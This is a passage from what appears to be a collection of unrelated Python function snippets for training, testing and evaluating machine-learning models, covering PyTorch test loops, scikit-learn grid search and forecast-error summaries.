expotencjalnym\n\t\tchi = int(chi)\n\t\takaike = round(akaike, 2)\n\n\t\treturn [ret, alfa, beta, chi, name, namePL, akaike]", "def test_02_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note ,test=True, prefix=LOG_PREFIX)\n\n df = pd.read_csv(log_file)\n logged_metric = [literal_eval(i) for i in df['metric'].copy()][-1]\n self.assertEqual(metric,logged_metric)", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def compareModel(self):\n\n # --------------------------------------------------------------------------------------------- #\n # Store the Model parameters\n lines = open(self.model, 'r').readlines()\n MyModel = {}\n for line in lines:\n if ('<source' in line) & ('name=' in line):\n srcNam = line.split('\"')[3]\n MyModel[ srcNam ] = {}\n elif ('<parameter' in line) & ('free=\"1\"' in line):\n parNam = line.split('\"')[7]\n parVal = float(line.split('\"')[11])\n MyModel[ srcNam ][ parNam ] = parVal\n else:\n pass\n\n # --------------------------------------------------------------------------------------------- #\n # Store the fitted results\n lines = open(self.outgtlike, 'r').readlines()\n CodeString = ''\n for line in lines:\n if not 'Upper limit' in line:\n CodeString += line[:-1]\n MyData = eval(CodeString) # create a dictionnary\n\n # --------------------------------------------------------------------------------------------- #\n # Compare\n for key in MyData.keys():\n if 'TS value' in MyData[key].keys():\n # The source has been fitted\n print(\"--- {} ---\".format(key))\n for k in MyModel[key].keys():\n difference = 100* (MyModel[key][k] - float(MyData[key][k].split()[0])) / MyModel[key][k] \n print(\"{0:s} differs by {1:.2f} per cent\".format(k, difference))\n return", "def test(self, load_file):\n self.load(load_file)\n table = self.truthtable()\n print \" ..... Test: Model Computes:\", table", "def test_best_val(self, te_acc):\n self.test_val = te_acc", "def test_fit():\n args = get_layer('fit', 'manual', 'temporal', False, False, window=2, step_size=3)\n run_layer(*args)", "def model_qua_launch(self, dict):\r\n list_result = []\r\n if \"SVR\" in dict:\r\n SVR = dict[\"SVR\"]\r\n if SVR[\"Auto\"]:\r\n result = SVR_b(self.ml_data.feature, self.ml_data.target, SVR[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"SVR Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = SVR_b(self.ml_data.feature, self.ml_data.target, SVR[\"Auto\"], [SVR[\"C\"],\r\n SVR[\"Kernel\"],\r\n SVR[\"Degree\"]])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"SVR Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n if \"LR\" in dict:\r\n LR = dict[\"LR\"]\r\n if LR[\"Auto\"]:\r\n result = regression_lin(self.ml_data.feature, self.ml_data.target, LR[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Linear Regression Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = regression_lin(self.ml_data.feature, self.ml_data.target, LR[\"Auto\"], LR[\"fit_intercept\"], LR[\"normalize\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Linear Regression Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"RT\" in dict:\r\n RT = dict[\"RT\"]\r\n if RT[\"Auto\"]:\r\n result = RegTree(self.ml_data.feature, self.ml_data.target, RT[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Regression Tree Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = RegTree(self.ml_data.feature, self.ml_data.target, RT[\"Auto\"], [RT[\"Criterion\"],\r\n RT[\"Min_Samples_Split\"],\r\n RT[\"Min_Samples_Leaf\"]])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Regression Tree Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"KNN\" in dict:\r\n KNN = dict[\"KNN\"]\r\n if KNN[\"Auto\"]:\r\n result = knn_class(self.ml_data.feature, self.ml_data.target, KNN[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"KNN Result Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = knn_class(self.ml_data.feature, self.ml_data.target, KNN[\"Auto\"],\r\n [KNN[\"leaf_size\"], KNN[\"n_neighbors\"], KNN[\"p\"], KNN[\"metric\"]])\r\n model, matrix, dict_cr, graph, time = result\r\n self.model_quali.close()\r\n result_win = Window()\r\n result_win.setWindowTitle(\"KNN Result\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n if \"LogiR\" in dict:\r\n LogiR = dict[\"LogiR\"]\r\n if LogiR[\"Auto\"]:\r\n result = LogReg(self.ml_data.feature, self.ml_data.target, LogiR[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Logistic Regression Result Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = LogReg(self.ml_data.feature, self.ml_data.target, LogiR[\"Auto\"], [LogiR['C'],\r\n LogiR['penalty']])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Logistic Regression Result\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"DTC\" in dict:\r\n DTC = dict[\"DTC\"]\r\n if DTC[\"Auto\"]:\r\n result = arbre_clas(self.ml_data.feature, self.ml_data.target, DTC[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Tree Decision Classification Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n else:\r\n result = arbre_clas(self.ml_data.feature, self.ml_data.target, DTC[\"Auto\"],DTC[\"max_leaf_nodes\"],DTC[\"max_depth\"],DTC[\"min_samples_split\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Tree Decision Classification\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n\r\n self.close()\r\n self.trigger_result.emit(list_result)", "def model_fit(train_features, train_actuals):\n for name in models.keys():\n est = models[name]\n est_params = params[name]\n gscv = GridSearchCV(estimator=est, param_grid=est_params, cv=5,\n scoring='neg_mean_absolute_error', return_train_score=True)\n gscv.fit(train_actuals, train_features)\n cvres = gscv.cv_results_\n print(cvres)\n print(\"best parameters are: {}\".format(gscv.best_estimator_))\n for mean_score,par in zip(cvres[\"mean_test_score\"],cvres[\"params\"]):\n print(-mean_score, par)", "def model_test(epo, natural):\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tn = batch_size\n\n\t\tif natural:\n\t\t\tloader = nat_test_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tloader = syn_test_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_cor_file = open(directory + \"/logs/test_\" + prefix + \"_cor_log.txt\", \"a\") # Correct\n\t\tlog_mae_file = open(directory + \"/logs/test_\" + prefix + \"_mae_log.txt\", \"a\") # MAE\n\t\tlog_dev_file = open(directory + \"/logs/test_\" + prefix + \"_dev_log.txt\", \"a\") # DEV\n\t\tlog_sam_file = open(directory + \"/logs/test_\" + prefix + \"_sam_log.txt\", \"a\") # Sample\n\n\t\tccs = []\n\t\tlabls = []\n\t\tnum_unlabeled = 0\n\t\tfor batch_idx, (data, labels) in enumerate(loader):\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\n\t\t\tif batch_idx == 0 and epo % 1000 == 0:\n\t\t\t\t# Save test sample\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\t\t\t# Save switch sample\n\t\t\t\tmodel.mode = 'synth' if natural else 'natural'\n\t\t\t\trecon_batch, _, _, _ = model(data)\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/switch_\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # Elementwise round of cellcounts\n\t\tlbls = np.concatenate(labls, axis=None) # Elementswise round of labels\n\n\t\tlog_sam_file.write(str(np.round(preds, 2)) + \"\\n\" + str(lbls) + \"\\n\")\n\t\tpreds = np.around(preds)\n\t\t#lbls = np.around(lbls)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of predictions and labels\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between preds and lbls\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Take the avg only of those deviations that weren't NaN\n\n\t\tlog_cor_file.write(str(correct)+\"\\n\")\n\t\tlog_mae_file.write(str(MAE)+\"\\n\")\n\t\tlog_dev_file.write(str(avg_dev)+\"\\n\")\n\n\t\t#logfile.write(str(correct) + \" correct, MAE: \" + str(MAE) + \", DEV: \" + str(avg_dev) + \" in \" + prefix + \" set in epoch \" + str(epoch) + \"\\n\\n\")\n\t\tlog_cor_file.close()\n\t\tlog_mae_file.close()\n\t\tlog_dev_file.close()\n\t\tlog_sam_file.close()\n\n\t\tglobal distance_sum\n\t\tdistance_sum = dist_sum\n\t\treturn correct, MAE", "def estimatePerformance(self, model):\n Y_pred = model.computeLOO()\n #performance = self.measure.multiOutputPerformance(self.Y, Y_pred)\n #performance = self.measure.getPerformance(self.Y, Y_pred)\n #performance = measure_utilities.aggregate(performance)\n performance = self.measure(self.Y, Y_pred)\n self.predictions.append(Y_pred)\n return performance", "def eval_model(config, period, test_data):\n if config.network == 'MLPwithGAN':\n model = MLPwithGAN(config)\n elif config.network == 'MLP':\n model = MLP(config)\n elif config.network == 'LSTM':\n model = VanillaLSTM(config)\n elif config.network == 'CNN':\n model = CNNfeature(config)\n else:\n raise Exception('Unknown model type:{}'.format(config.network))\n\n if config.ensemble:\n m = model\n model = []\n\n for i in glob(gen_path(config.path, str(period)) + '/m*'):\n m.load_state_dict(\n torch.load(gen_path(i, filename=config.network + '.pkl')))\n m.to(config.device)\n m.eval()\n model.append(m)\n else:\n model.load_state_dict(\n torch.load(gen_path(config.path, str(period), 'model', filename=config.network + '.pkl')))\n model.to(config.device)\n model.eval()\n dataloader_test = test_data[0]\n test_date = test_data[1]\n test_symbol = test_data[2]\n sc_y = joblib.load(gen_path(config.path, str(period), 'scaler', filename='training_sc_y.pkl'))\n predict_y_test, real_y_test, valid_index_test = make_prediction(dataloader_test, sc_y, model, config)\n\n stock_score = pd.DataFrame()\n stock_score[\"symbol\"] = test_symbol[valid_index_test]\n stock_score[\"score\"] = predict_y_test\n stock_score['truth'] = real_y_test\n stock_score[\"date\"] = test_date[valid_index_test]\n stock_score = stock_score.sort_values(by=[\"date\"])\n stock_score.to_csv(gen_path(config.path, 'stock_score', filename=str(period) + '.csv'), index=False)", "def test_model(loader, model):\n correct = 0\n total = 0\n model.eval()\n for data, labels in loader:\n data_batch, label_batch = data.to(device), labels.to(device)\n outputs = F.softmax(model(data_batch), dim=1)\n predicted = outputs.max(1, keepdim=True)[1]\n total += label_batch.size(0)\n correct += predicted.eq(label_batch.view_as(predicted)).sum().item()\n return (100 * correct / total)", "def model_performance_summary(df, data_all_df, cov_buck, fisc_calender, mod_start, pred_start, summ_start, summ_end):\n var = \"pv_yr\" \n agg_col = \"LINE_ORDERS\"\n select_cols = [ \"LINE_ORDERS_ACT\", \"Prediction_Trf\", \"LEAD_MNTS_ACT\", \"LD_UNCLAIMED_ACT\", \"LD_DRIVE_ACT\", \n \"IDV_LEAD_MNTS_Pred\", \"IDV_LD_UNCLAIMED_Pred\", \"IDV_LD_DRIVE_Pred\",\n \"IDV_LEAD_MNTS_ACT\", \"IDV_LD_UNCLAIMED_ACT\", \"IDV_LD_DRIVE_ACT\",\n \"HELPER_MNTS_ACT\", \"HP_UNCLAIMED_ACT\", \"HP_DRIVE_ACT\",\n \"IDV_HELPER_MNTS_Pred\", \"IDV_HP_UNCLAIMED_Pred\", \"IDV_HP_DRIVE_Pred\",\n \"IDV_HELPER_MNTS_ACT\", \"IDV_HP_UNCLAIMED_ACT\", \"IDV_HP_DRIVE_ACT\",\n \"HELPER_OVR_ACT\", \"HPN_UNCLAIMED_ACT\", \"HPN_DRIVE_ACT\",\n \"IDV_HELPER_OVR_Pred\", \"IDV_HPN_UNCLAIMED_Pred\", \"IDV_HPN_DRIVE_Pred\",\n \"IDV_HELPER_OVR_ACT\", \"IDV_HPN_UNCLAIMED_ACT\", \"IDV_HPN_DRIVE_ACT\"\n ]\n\n for i in select_cols:\n if str(i) not in data_all_df.columns:\n data_all_df[str(i)] = np.nan\n\n cov_grp_mm = dp.cov_check(\"RSS_MM\", df, cov_buck, agg_col, fisc_calender, summ_start, summ_end)\n cov_mm = dp.cov_check(\"MM\", df, cov_buck, agg_col, fisc_calender, summ_start, summ_end)\n \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n sample = pd.merge(sample, cov_grp_mm[[\"RSS_MM\", \"CAT\"]])\n sample.CAT = sample.CAT.astype(int)\n sample[\"MAPE\"] = abs(sample[\"LINE_ORDERS_ACT\"]-sample[\"Prediction_Trf\"])/sample[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels = [1, 2, 3, 4, 5, 6, 7]\n sample[\"MAPE_BIN\"] = pd.cut(sample['MAPE'], bins=bins, labels=labels)\n wk_list = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID >= pred_start].FISC_WK_OF_MTH_ID.unique()\n ly_start = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID == wk_list[4]].LY_FISC_WK_OF_MTH_ID.values\n ly_end = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID == wk_list[16]].LY_FISC_WK_OF_MTH_ID.values\n train = sample[((sample.FISC_WK_OF_MTH_ID >= mod_start) & (sample.FISC_WK_OF_MTH_ID < pred_start))]\n test_in_train = sample[((sample.FISC_WK_OF_MTH_ID >= ly_start[0]) & (sample.FISC_WK_OF_MTH_ID <= ly_end[0]))]\n # The 4 th index of the list has the prediction start date after excluding the 4 week hold out period\n # for analysis purpose we are considereing only 13 weeks of test period\n test = sample[((sample.FISC_WK_OF_MTH_ID >= wk_list[4]) & (sample.FISC_WK_OF_MTH_ID <= wk_list[16]))]\n fy20 = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n \n ####################################################################################\n \n df_grp_summary = fy20.groupby([\"RSS\"]).sum()[\"LINE_ORDERS_ACT\"].reset_index()\n df_grp_summary[\"LINE_ORDERS_PERC\"] = df_grp_summary[\"LINE_ORDERS_ACT\"]/df_grp_summary[\"LINE_ORDERS_ACT\"].sum()\n ####################################################################################\n \n df_sample_list = []\n df_sample_list = cu.mape_stability(train, \"Train CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(test_in_train, \"Test_in_train CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(test, \"Test CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(fy20, \"FY20 CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n stability = pd.concat(df_sample_list)\n stability.reset_index(inplace = True)\n ####################################################################################\n \n df_sample_res = cu.mape_stability_2d(fy20, \"FISC_MTH_NBR\", \"CAT\")\n grp_sum = fy20.groupby(\"FISC_MTH_NBR\").sum()[\"LINE_ORDERS_ACT\"].reset_index()\n monthly_stability_check = df_sample_res.merge(grp_sum)\n ####################################################################################\n \n mape_cov = cu.mape_stability_2d(fy20, \"CAT\", \"MAPE_BIN\")\n ####################################################################################\n \n mape_grp = cu.mape_stability_2d(fy20, \"RSS\", \"MAPE_BIN\")\n mape_grp[\"TYPE\"] = \"MAPE Buckets\"\n ####################################################################################\n \n mape_cov_grp = cu.mape_stability_2d(fy20, \"RSS\", \"CAT\")\n mape_cov_grp[\"TYPE\"] = \"Covariance Category\"\n ####################################################################################\n \n fy20 = cu.sh_mape(fy20)\n \n sh_summary = []\n for grp in fy20[\"RSS\"].unique():\n sample_df = fy20[fy20[\"RSS\"] == grp]\n\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_LD_BIN\", \"MAPE_LD\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_HP_BIN\", \"MAPE_HP\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_HPN_BIN\", \"MAPE_HPN\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_summary_grp = pd.concat(sh_summary)\n sh_summary_grp.reset_index(inplace = True)\n\n ####################################################################################\n\n sh_summary = []\n var_list = [\"pv_yr\", \"pv_roll_5wk\"]\n for var in var_list:\n sample_df = data_all_df[data_all_df.Variable_Type == var].groupby([\"FISC_WK_OF_MTH_ID\", \"FISC_YR_NBR\", \"MM\"]).sum()[select_cols].reset_index()\n sample_df = pd.merge(sample_df, cov_mm[[\"MM\", \"CAT\"]])\n sample_df = sample_df[sample_df.CAT>0]\n sample_df = sample_df[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n sample_df = cu.sh_mape(sample_df)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LDA_BIN\", \"MAPE_LD_ACT\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPA_BIN\", \"MAPE_HP_ACT\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPNA_BIN\", \"MAPE_HPN_ACT\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LD_BIN\", \"MAPE_LD\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HP_BIN\", \"MAPE_HP\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPN_BIN\", \"MAPE_HPN\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_mm_summary_df = pd.concat(sh_summary)\n sh_mm_summary_df.reset_index(inplace = True)\n\n ####################################################################################\n\n sh_summary = []\n for var in data_all_df.Variable_Type.unique():\n sample_df = data_all_df[data_all_df.Variable_Type == var].groupby([\"FISC_WK_OF_MTH_ID\", \"FISC_YR_NBR\", \"MM\"]).sum()[select_cols].reset_index()\n sample_df[select_cols] = sample_df[select_cols].replace({0:np.nan})\n sample_df = pd.merge(sample_df, cov_mm[[\"MM\", \"CAT\"]])\n sample_df = sample_df[sample_df.CAT>0]\n sample_df = sample_df[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n sample_df = cu.sh_mape(sample_df)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LDAP_BIN\", \"MAPE_LD_ACT_PRED\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPAP_BIN\", \"MAPE_HP_ACT_PRED\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPNAP_BIN\", \"MAPE_HPN_ACT_PRED\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_prop_summary = pd.concat(sh_summary)\n sh_prop_summary.reset_index(inplace = True)\n \n best_mthd = sh_prop_summary.groupby(['IDENTIFIER']).mean()['WEIGHTED MAPE'].reset_index().sort_values(by = [\"WEIGHTED MAPE\"], ascending = True)\n var_list = best_mthd[\"IDENTIFIER\"][:2].to_list()\n ####################################################################################\n\n sample_df = fy20.copy()\n sample_df = sample_df[sample_df.MM.str.contains(\"HD\")]\n sample_df = sample_df.groupby([\"FISC_WK_OF_MTH_ID\", \"MM\"]).sum()[[\"LINE_ORDERS_ACT\", \"Prediction_Trf\"]].reset_index()\n df_grp_all = sample_df.copy()\n df_grp_all[[\"LINE_ORDERS_ACT\"]] = df_grp_all[[\n \"LINE_ORDERS_ACT\"]].replace({0:np.nan})\n df_grp_all[\"MAPE_TA\"] = abs(df_grp_all[\"LINE_ORDERS_ACT\"]-df_grp_all[\"Prediction_Trf\"])/df_grp_all[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels = [1, 2, 3, 4, 5, 6, 7]\n df_grp_all[\"MAPE_TA_BIN\"] = pd.cut(df_grp_all['MAPE_TA'], bins=bins, labels=labels)\n\n var = \"pv_yr\" \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n \n sample = sample.merge(cov_grp_mm[[\"RSS_MM\", \"CAT\"]])\n sample = sample[sample.CAT > 0]\n sample = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n \n \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n sample = pd.merge(sample, cov_mm[[\"MM\", \"CAT\"]])\n sample = sample[sample.CAT > 0]\n sample = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n fy20_mm = sample.groupby([\"FISC_WK_OF_MTH_ID\", \"MM\", \"CAT\"]).sum()[[\"LINE_ORDERS_ACT\", \"Prediction_Trf\"]].reset_index()\n fy20_mm[[\"LINE_ORDERS_ACT\" ]] = fy20_mm[[\"LINE_ORDERS_ACT\"]].replace({0:np.nan})\n fy20_mm[\"MAPE\"] = abs(fy20_mm[\"LINE_ORDERS_ACT\"]-fy20_mm[\"Prediction_Trf\"])/fy20_mm[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels = [1, 2, 3, 4, 5, 6, 7]\n fy20_mm[\"MAPE_BIN\"] = pd.cut(fy20_mm['MAPE'], bins=bins, labels=labels)\n \n df_sample_list = []\n df_sample_list = cu.mape_stability(fy20, \"FY20 RSS_MM\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(fy20_mm, \"FY20 MM\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_overall_summay = pd.concat(df_sample_list)\n df_overall_summay.reset_index(inplace = True)\n return df_grp_summary, stability, monthly_stability_check, mape_cov, mape_cov_grp, mape_grp, sh_mm_summary_df, sh_summary_grp, sh_prop_summary, df_overall_summay, var_list", "def test(self, dataset):\n test_accuracy = 0\n test_loss = 0\n num_examples_tested = 0\n # Put model into evaluation mode\n self.model.eval()\n for num, batch in enumerate(dataset.loader):\n xs, ys = batch\n batch_size = len(xs)\n num_examples_tested += batch_size\n iloss, iaccuracy = self.model(xs, ys)\n test_loss += iloss.cpu().data.numpy().item() * batch_size\n test_accuracy += iaccuracy.cpu().data.numpy().item() * batch_size\n test_accuracy = test_accuracy / num_examples_tested\n test_loss = test_loss / num_examples_tested\n # Return accuracy and loss for this model on the test set\n return test_accuracy, test_loss", "def train_model(regressor=DecisionTreeRegressor(max_depth=3, random_state=42),\n dataset_file_name=DATASET_FILE_NAME,\n model_file_name=MODEL_FILE_NAME):\n df = pd.read_csv(dataset_file_name)\n\n # A minumum amount of feature engineering: The player's and opponent's\n # exact score may not be that important for our decisions. The difference,\n # however, certainly is. Moreover, the card value itself is not that\n # important. Here, the sum is.\n df['score_difference'] = df.self_score - df.opp_score\n df.drop(columns=['opp_score'], inplace=True)\n df['score_if_card_played'] = df.self_score + df.result_card_val\n df.drop(columns=['result_card_val'], inplace=True)\n\n # Strategy will be to let our model predict the score for different actions\n # Hence, we're going to train the model on that now\n X, y = df.drop(columns='score'), df.score\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)\n regressor.fit(X_train, y_train)\n\n feature_names = ['self_score', 'opp_stands', 'result_stand',\n 'score_difference', 'score_if_card_played']\n\n score = regressor.score(X_test, y_test)\n print(f\"Score on the test set: {score}.\")\n if isinstance(regressor, DecisionTreeRegressor):\n export_graphviz(regressor, feature_names=feature_names,\n out_file=GRAPHVIZ_FILE_NAME, filled=True)\n\n # For persistence, we export the generated model\n dump(regressor, model_file_name)\n return score", "def test(self, test):\r\n self.ml_data.set_target(test[0])\r\n self.ml_data.set_features(test[1])\r\n if self.ml_data.target_type.all() == np.float64 or self.ml_data.target_type.all() == np.int64:\r\n self.model_qua.open()\r\n else:\r\n self.model_quali.open()", "def fit(model, data, test_ids, exp_name, train_ids=None):\n if model.model_type == 'torch':\n size = len(data[0])\n else:\n size = data[0].shape[0]\n \n if train_ids == None:\n train_ids = [i for i in range(size) if i not in test_ids]\n scaler = pka_scaler(data[1][train_ids])\n \n if model.data_type == 'descriptors':\n desc_scaler = StandardScaler()\n scaling_data = data[0][train_ids]\n desc_scaler.fit(scaling_data)\n data[0] = desc_scaler.transform(data[0])\n else:\n scaling_data = None\n \n trained_model = train(model, train_ids, data, scaler)\n results = test(model, trained_model, test_ids, data, scaler)\n model.experiments[exp_name] = {'model':trained_model, 'results':results, 'scaler':scaler, 'desc scaling data':scaling_data}\n return results", "def test_model(model, dataObj, index):\n\t(s,m,l), img = dataObj.__getitem__(index)\n\timg = img.float().unsqueeze(0)\n\t\n\tif next(model.parameters()).is_cuda:\n\t\toutput = model(img.cuda()) \n\telse:\n\t\toutput = model(img)\n\n\ts_pred,m_pred,l_pred = output[0].squeeze(0).cpu(), output[1].squeeze(0).cpu(), output[2].squeeze(0).cpu()\n\ts_pred = s_pred.detach().numpy()\n\tm_pred = m_pred.detach().numpy()\n\tl_pred = l_pred.detach().numpy()\n\n\timg = img.float().squeeze(0)\n\timg = img.permute(1,2,0)\n\n\tfor j in range(22):\n\t\tvisualize(img, s[j], m[j], l[j], s_pred[j], m_pred[j], l_pred[j])\n\t\tk = np.array(s[j])", "def evaluate_model(model, X_test, Y_test, category_names):\n\n print(\"Testing Performance\")\n print(classification_report(Y_test, model.predict(X_test), target_names=category_names))\n\n #Todo cat names", "def test(self):\n self.training = False", "def evaluate_model(model, X_test, y_test):\n # run prediction with test data\n y_pred = model.predict(X_test)\n\n # print precision, recall and f1-score\n i = 